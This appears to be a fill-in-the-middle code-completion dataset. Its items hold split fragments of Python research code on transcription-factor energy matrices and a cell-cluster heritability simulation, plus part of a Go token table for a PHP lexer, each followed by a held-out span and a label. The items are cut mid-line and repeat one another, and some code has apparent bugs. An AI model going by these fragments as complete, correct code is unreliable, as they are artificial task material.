matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif | predict_site_energy | identifier_name |
energy_matrix_analysis.py |
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic | return specific_binding | conditional_block | |
energy_matrix_analysis.py | -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
|
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
| """Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C | identifier_body |
Script 1-relative heritability-plotted(Figure 2a)-2.py | of 10 clusters (each with a different genetic mean size) goes through.
number_of_stdevs=5 #this name is a bit confusing, but this is the number of different st_devs to be run in the iteration
replicates=10
#use these lists for running multiple iterations of cell and group stdevs
group_stdev_iterator=np.linspace(.0001,st_dev_cell,number_of_stdevs)
cell_stdev_iterator=np.linspace(.0001,st_dev_group,number_of_stdevs)
group_sizes=[]
st_dev_cells=[]
st_dev_groups=[]
slope_cell=[]
slope_group_volume=[]
slope_group_radius=[]
slope_group_settling=[]
stdev_list = [ [] for i in range(number_of_stdevs) ]
group_sizes_list = [ [] for i in range(len(cell_genos)) ]
gs=4 #is the number of cells per group from 2 to 32
"""So, here's how the population is initialized:
Col A: Cell ID (#)
Col B: Cell genetic size
Col C: Cellular phenotype
Col D: Cell parent
Col E: Cluster ID (#)
Col F: Cluster parent
Col G: empty
Col H: empty
Col I: empty
Col J: Cell parental phenotype"""
for ii in range(0,len(stdev_list)):
for a in np.arange(2,gs+2,2):
cluster_size=a
off_spring_std=a/3
for b in range(0,replicates):
pop=np.zeros((len(cell_genos)*cluster_size,replicates))
#print(np.shape(pop))
st_dev_cell=cell_stdev_iterator[ii] #change this to st_dev_group=group_stdev_iterator[ii] to iterate across group-level variance
#st_dev_group=group_stdev_iterator[ii]
#initialize the population
#for i in range(0,np.shape(pop)[0]):
for i in range(0,np.shape(pop)[0]):
pop[i][0]=i #ID each cell
pop[i][1]=cell_genos[math.floor(i/cluster_size)]
pop[i][2]=np.random.normal(pop[i][1],st_dev_cell)
pop[i][4]=math.floor(i/cluster_size)
timestep=1
#print(np.shape(pop))
pop1=pop
#run through a round of reproduction
for j in range(0,timesteps_to_run):
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
cells_added=len(cell_genos)*cluster_size*2**(timestep)
print(int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep),off_spring_std)))
cells_added_first=len(cell_genos)*cluster_size*2**(timestep-1) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
#cells_added_first=int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep-1),off_spring_std)) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
"""
print("st_dev value %d of %d" %(ii, number_of_stdevs))
print("cluster size", a)
print("replicate", b)
print("generation number", timestep)
print("population size", len(cell_genos)*cluster_size*2**(timestep-1))
print("number of cells added this timestep", cells_added)
"""
#first cluster produced
cluster_variance_factor=np.random.normal(1,st_dev_group)
for i in range(0,cells_added_first): #this loops through every additional cell for the first cluster offspring
if (cluster_max+math.floor(i/cluster_size))!=(cluster_max+math.floor((i-1)/cluster_size)): #if your cluster number does not equal the one lower down from you, then you get a new cluster-level variance factor.
cluster_variance_factor=np.random.normal(1,st_dev_group)
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added_first][1],np.random.normal(pop[(cell_max+i)-cells_added_first][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added_first][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added_first][4],0,0,0,pop[(cell_max+i)-cells_added_first][2]]])
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
#second cluster produced
for i in range(0,cells_added_first):
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added][1],np.random.normal(pop[(cell_max+i)-cells_added][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added][4],0,0,0,pop[(cell_max+i)-cells_added][2]]])
timestep+=1
pop1=[]
for j in range(np.shape(pop)[0]):
if np.random.rand() > 0.05:
pop1.append(pop[j])
np.savetxt("full-population.csv", pop1, delimiter=",") #this will save a CSV of the whole run, use for statistics or error-checking
cell_x=pop[:,9]
cell_y=pop[:,2]
cell_x=cell_x[len(cell_genos)*cluster_size:]
cell_y=cell_y[len(cell_genos)*cluster_size:]
#linear regression of parent on offspring phenotype
#print("slope of parent-offspring regression for CELL size is", linregress(cell_x,cell_y)[0])
#Pandas dataframe work isolating groups
df=pd.DataFrame(pop1)
size_by_ID=df.groupby(4)[2].sum()
parent_by_ID=df.groupby(4)[5].mean()
print("I AM HERE!!!")
joined=pd.concat([size_by_ID,parent_by_ID], axis=1, ignore_index=True)
parent_size=[]
for i in range(0,len(joined[0])):
j=joined[1][i]
parent_size.append(joined[0][j])
offspring_size=joined[0]
| offspring_radius=[]
for i in range(0,len(parent_size_cleaned)):
parent_radius.append((3.*parent_size_cleaned[i]/(4.*math.pi))**(1./3.)) #manual check of this calculation confirmed it is correct
for i in range(0,len(offspring_size_cleaned)):
offspring_radius.append((3.*offspring_size_cleaned[i]/(4.*math.pi))**(1./3.))
parent_stokes=[]
offspring_stokes=[]
for i in range(0,len(parent_size_cleaned)):
parent_stokes.append((9.81*(2*parent_radius[i])**2*(.1)) / (18.*1.002)) #Manual check of this calculation confirms it is correct. #9.81 is m/s gravity, then diameter (in Meters, which we might want to change!), then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
for i in range(0,len(offspring_size_cleaned)):
offspring_stokes.append((9.81*(2*offspring_radius[i])**2*(.1)) / (18.*1.002)) #9.81 is m/s gravity, then diameter, then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
"""
print("slope of parent-offspring regression for GROUP volume is", linregress(parent_size_cleaned,offspring_size_cleaned)[0])
print("slope of parent-offspring regression for GROUP radius is", linregress(parent_radius,offspring_radius)[0])
print("slope of parent-offspring regression for GROUP settling speed is", linregress(parent_stokes,offspring_stokes)[0])
print("size", parent_size_cleaned[1], len(parent_size_cleaned))
print("radius", parent_radius[1], len(parent_radius))
print("stokes", parent_stokes[1], len(parent_stokes))
"""
#group_sizes.append(a)
group_sizes_list[ii].append(a)
#slope_cell.append(linregress(cell_x,cell_y)[0])
#slope_group_volume.append(linregress(parent_size_cleaned,offspring_size_cleaned)[0])
#slope_group_radius.append(linregress(parent_radius,offspring_radius)[0])
#slope_group_settling.append(linregress(parent_stokes,offspring_stokes)[0])
"""
print("heritability groups", (lin | parent_size_cleaned=list(parent_size[len(cell_genos):])
offspring_size_cleaned=list(offspring_size[len(cell_genos):])
parent_radius=[]
| random_line_split |
Script 1-relative heritability-plotted(Figure 2a)-2.py | of 10 clusters (each with a different genetic mean size) goes through.
number_of_stdevs=5 #this name is a bit confusing, but this is the number of different st_devs to be run in the iteration
replicates=10
#use these lists for running multiple iterations of cell and group stdevs
group_stdev_iterator=np.linspace(.0001,st_dev_cell,number_of_stdevs)
cell_stdev_iterator=np.linspace(.0001,st_dev_group,number_of_stdevs)
group_sizes=[]
st_dev_cells=[]
st_dev_groups=[]
slope_cell=[]
slope_group_volume=[]
slope_group_radius=[]
slope_group_settling=[]
stdev_list = [ [] for i in range(number_of_stdevs) ]
group_sizes_list = [ [] for i in range(len(cell_genos)) ]
gs=4 #is the number of cells per group from 2 to 32
"""So, here's how the population is initialized:
Col A: Cell ID (#)
Col B: Cell genetic size
Col C: Cellular phenotype
Col D: Cell parent
Col E: Cluster ID (#)
Col F: Cluster parent
Col G: empty
Col H: empty
Col I: empty
Col J: Cell parental phenotype"""
for ii in range(0,len(stdev_list)):
for a in np.arange(2,gs+2,2):
cluster_size=a
off_spring_std=a/3
for b in range(0,replicates):
pop=np.zeros((len(cell_genos)*cluster_size,replicates))
#print(np.shape(pop))
st_dev_cell=cell_stdev_iterator[ii] #change this to st_dev_group=group_stdev_iterator[ii] to iterate across group-level variance
#st_dev_group=group_stdev_iterator[ii]
#initialize the population
#for i in range(0,np.shape(pop)[0]):
for i in range(0,np.shape(pop)[0]):
pop[i][0]=i #ID each cell
pop[i][1]=cell_genos[math.floor(i/cluster_size)]
pop[i][2]=np.random.normal(pop[i][1],st_dev_cell)
pop[i][4]=math.floor(i/cluster_size)
timestep=1
#print(np.shape(pop))
pop1=pop
#run through a round of reproduction
for j in range(0,timesteps_to_run):
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
cells_added=len(cell_genos)*cluster_size*2**(timestep)
print(int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep),off_spring_std)))
cells_added_first=len(cell_genos)*cluster_size*2**(timestep-1) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
#cells_added_first=int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep-1),off_spring_std)) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
"""
print("st_dev value %d of %d" %(ii, number_of_stdevs))
print("cluster size", a)
print("replicate", b)
print("generation number", timestep)
print("population size", len(cell_genos)*cluster_size*2**(timestep-1))
print("number of cells added this timestep", cells_added)
"""
#first cluster produced
cluster_variance_factor=np.random.normal(1,st_dev_group)
for i in range(0,cells_added_first): #this loops through every additional cell for the first cluster offspring
if (cluster_max+math.floor(i/cluster_size))!=(cluster_max+math.floor((i-1)/cluster_size)): #if your cluster number does not equal the one lower down from you, then you get a new cluster-level variance factor.
|
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added_first][1],np.random.normal(pop[(cell_max+i)-cells_added_first][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added_first][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added_first][4],0,0,0,pop[(cell_max+i)-cells_added_first][2]]])
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
#second cluster produced
for i in range(0,cells_added_first):
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added][1],np.random.normal(pop[(cell_max+i)-cells_added][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added][4],0,0,0,pop[(cell_max+i)-cells_added][2]]])
timestep+=1
pop1=[]
for j in range(np.shape(pop)[0]):
if np.random.rand() > 0.05:
pop1.append(pop[j])
np.savetxt("full-population.csv", pop1, delimiter=",") #this will save a CSV of the whole run, use for statistics or error-checking
cell_x=pop[:,9]
cell_y=pop[:,2]
cell_x=cell_x[len(cell_genos)*cluster_size:]
cell_y=cell_y[len(cell_genos)*cluster_size:]
#linear regression of parent on offspring phenotype
#print("slope of parent-offspring regression for CELL size is", linregress(cell_x,cell_y)[0])
#Pandas dataframe work isolating groups
df=pd.DataFrame(pop1)
size_by_ID=df.groupby(4)[2].sum()
parent_by_ID=df.groupby(4)[5].mean()
print("I AM HERE!!!")
joined=pd.concat([size_by_ID,parent_by_ID], axis=1, ignore_index=True)
parent_size=[]
for i in range(0,len(joined[0])):
j=joined[1][i]
parent_size.append(joined[0][j])
offspring_size=joined[0]
parent_size_cleaned=list(parent_size[len(cell_genos):])
offspring_size_cleaned=list(offspring_size[len(cell_genos):])
parent_radius=[]
offspring_radius=[]
for i in range(0,len(parent_size_cleaned)):
parent_radius.append((3.*parent_size_cleaned[i]/(4.*math.pi))**(1./3.)) #manual check of this calculation confirmed it is correct
for i in range(0,len(offspring_size_cleaned)):
offspring_radius.append((3.*offspring_size_cleaned[i]/(4.*math.pi))**(1./3.))
parent_stokes=[]
offspring_stokes=[]
for i in range(0,len(parent_size_cleaned)):
parent_stokes.append((9.81*(2*parent_radius[i])**2*(.1)) / (18.*1.002)) #Manual check of this calculation confirms it is correct. #9.81 is m/s gravity, then diameter (in Meters, which we might want to change!), then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
for i in range(0,len(offspring_size_cleaned)):
offspring_stokes.append((9.81*(2*offspring_radius[i])**2*(.1)) / (18.*1.002)) #9.81 is m/s gravity, then diameter, then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
"""
print("slope of parent-offspring regression for GROUP volume is", linregress(parent_size_cleaned,offspring_size_cleaned)[0])
print("slope of parent-offspring regression for GROUP radius is", linregress(parent_radius,offspring_radius)[0])
print("slope of parent-offspring regression for GROUP settling speed is", linregress(parent_stokes,offspring_stokes)[0])
print("size", parent_size_cleaned[1], len(parent_size_cleaned))
print("radius", parent_radius[1], len(parent_radius))
print("stokes", parent_stokes[1], len(parent_stokes))
"""
#group_sizes.append(a)
group_sizes_list[ii].append(a)
#slope_cell.append(linregress(cell_x,cell_y)[0])
#slope_group_volume.append(linregress(parent_size_cleaned,offspring_size_cleaned)[0])
#slope_group_radius.append(linregress(parent_radius,offspring_radius)[0])
#slope_group_settling.append(linregress(parent_stokes,offspring_stokes)[0])
"""
print("heritability groups", (linreg | cluster_variance_factor=np.random.normal(1,st_dev_group) | conditional_block |
token.go |
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
